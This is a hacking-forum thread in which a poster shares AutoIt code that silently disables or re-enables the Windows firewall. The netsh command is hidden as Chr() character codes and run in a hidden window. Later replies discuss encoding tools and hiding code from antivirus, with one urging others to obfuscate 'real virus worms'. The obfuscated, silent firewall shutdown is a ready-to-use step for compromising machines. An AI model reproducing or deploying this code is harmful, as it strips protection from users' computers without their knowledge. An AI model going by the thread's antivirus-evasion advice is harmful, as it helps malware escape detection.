Login Register






[AutoIt]Another method to stop/start the firewall filter_list
Author
Message
[AutoIt]Another method to stop/start the firewall #1
Disable:
Code:
RunWait(Chr(110)&Chr(101)&Chr(116)&Chr(115)& _ Chr(104)&Chr(32)&Chr(102)&Chr(105)&Chr(114)& _ Chr(101)&Chr(119)&Chr(97)&Chr(108)&Chr(108)& _ Chr(32)&Chr(115)&Chr(101)&Chr(116)&Chr(32)& _ Chr(111)&Chr(112)&Chr(109)&Chr(111)&Chr(100)& _ Chr(101)&Chr(32)&Chr(68)&Chr(73)&Chr(83)& _ Chr(65)&Chr(66)&Chr(76)&Chr(69),Chr(0),@SW_HIDE)


Enable:
Code:
RunWait(Chr(110)&Chr(101)&Chr(116)&Chr(115)& _ Chr(104)&Chr(32)&Chr(102)&Chr(105)&Chr(114)& _ Chr(101)&Chr(119)&Chr(97)&Chr(108)&Chr(108)& _ Chr(32)&Chr(115)&Chr(101)&Chr(116)&Chr(32)& _ Chr(111)&Chr(112)&Chr(109)&Chr(111)&Chr(100)& _ Chr(101)&Chr(32)&Chr(69)&Chr(78)&Chr(65)& _ Chr(66)&Chr(76)&Chr(69),Chr(0),@SW_HIDE)
Pierce the life fibers with your drill.

Reply

RE: [AutoIt]Another method to stop/start the firewall #2
How can I decrypt this code ,to see the source code? btw great job Wink

Reply

RE: [AutoIt]Another method to stop/start the firewall #3
(11-07-2011, 10:44 PM)Golliath808 Wrote: How can I decrypt this code ,to see the source code? btw great job Wink

I'll make a method for you soon Tongue

after i make the tripple-DES-Binary-Hex encryption >Smile
Pierce the life fibers with your drill.

Reply

RE: [AutoIt]Another method to stop/start the firewall #4
sorry for asking stupid, (I just tested it and it works) but I got no idea how it works, what is all this:

(Chr(110)&Chr(101)&Chr(116)&Chr(115)& _
Chr(104)&Chr(32)&Chr(102)&Chr(105)&Chr(114)& _
Chr(101)&Chr(119)&Chr(97)&Chr(108)&Chr(108)& _
Chr(32)&Chr(115)&Chr(101)&Chr(116)&Chr(32)& _
Chr(111)&Chr(112)&Chr(109)&Chr(111)&Chr(100)& _
Chr(101)&Chr(32)&Chr(68)&Chr(73)&Chr(83)& _
Chr(65)&Chr(66)&Chr(76)&Chr(69),Chr(0)

what does it do, and what is all the numbers for, please explain Smile
[Image: AQiSh.jpg]

Reply

RE: [AutoIt]Another method to stop/start the firewall #5
http://www.hackcommunity.com/Thread-Auto...-converter
Pierce the life fibers with your drill.

Reply

RE: [AutoIt]Another method to stop/start the firewall #6
hi 1234hotmaster thanks alot Smile what a great tool you have made, will be using that alot.

what is most secure, to use it with the option "reverse hex" or without?
[Image: AQiSh.jpg]

Reply

RE: [AutoIt]Another method to stop/start the firewall #7
Obviously, "With". Btw lets not be offtopic on others posts too Tongue
Pierce the life fibers with your drill.

Reply

RE: [AutoIt]Another method to stop/start the firewall #8
Nice Encyption and there is easy way to creat Decryption too :)

*censored*
(This post was last modified: 09-24-2012, 10:55 PM by Skullmeat.)

Reply

RE: [AutoIt]Another method to stop/start the firewall #9
(09-24-2012, 05:08 PM)thmaster100 Wrote: Nice Encyption and there is easy way to creat Decryption too Smile

*CENSORED*

Well I didn't ask for anyone to post it decrypted because that would ruin the purpose of encrypting it in the first place :oO:
Pierce the life fibers with your drill.

Reply

RE: [AutoIt]Another method to stop/start the firewall #10
(09-24-2012, 10:55 PM)1234hotmaster Wrote:
(09-24-2012, 05:08 PM)thmaster100 Wrote: Nice Encyption and there is easy way to creat Decryption too Smile

*CENSORED*

Well I didn't ask for anyone to post it decrypted because that would ruin the purpose of encrypting it in the first place :oO:

at least crypt something that av detect like real virus worms Smile

don't me angry dude I used to code for long time :dance:

Reply